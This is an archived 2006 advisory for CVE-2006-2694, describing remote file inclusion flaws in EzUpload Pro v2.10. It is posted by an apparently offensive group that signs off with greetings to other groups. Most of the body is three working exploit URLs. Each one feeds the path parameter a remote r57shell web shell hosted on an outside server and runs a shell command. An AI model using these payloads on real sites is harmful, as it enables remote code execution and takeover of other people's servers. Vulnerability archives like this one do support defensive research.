Bug: multiple file include exploits in EzUpload Pro v2.10 (WLB-2006060004 Ascii Version)

English Version
WLB2

CVE WLB2

 Topic: multiple file include exploits in EzUpload Pro v2.10
 Credit: black-cod3 hotmail com
 Date: 2006.06.01
 CWE: N/A
 CVE: CVE-2006-2694 (Show details)

Use CVE to see details like:
- CVSS2,
- Affected Software,
- References

Risk
Local
Remote
Medium
Yes
Yes

multiple file include exploits in EzUpload Pro v2.10

forum type : EzUpload Pro v2.10

bug found by : black-code & sweet-devil

team : site-down

type : file include

####################################################

exploits :

form.php

http://www.example.com/path/form.php?path=http://rst.void.ru/download/r5
7shell.txt?&cmd=pwd

customize.php

http://www.example.com/arab3upload/customize.php?path=http://rst.void.ru
/download/r57shell.txt?&cmd=pwd

initialize.php

http://www.example.com/arab3upload/initialize.php?path=http://rst.void.r
u/download/r57shell.txt?&cmd=pwd

####################################################

path to admin login:

#######################

emails:

black-cod3 (at) hotmail (dot) com [email concealed] & gamr-14 (at) hotmail (dot) com [email concealed]

#######################

All my respect to our friends , lezr.com , g123g.net

done .. peace

[ ASCII VERSION ]

Copyright 2012, cxsecurity.com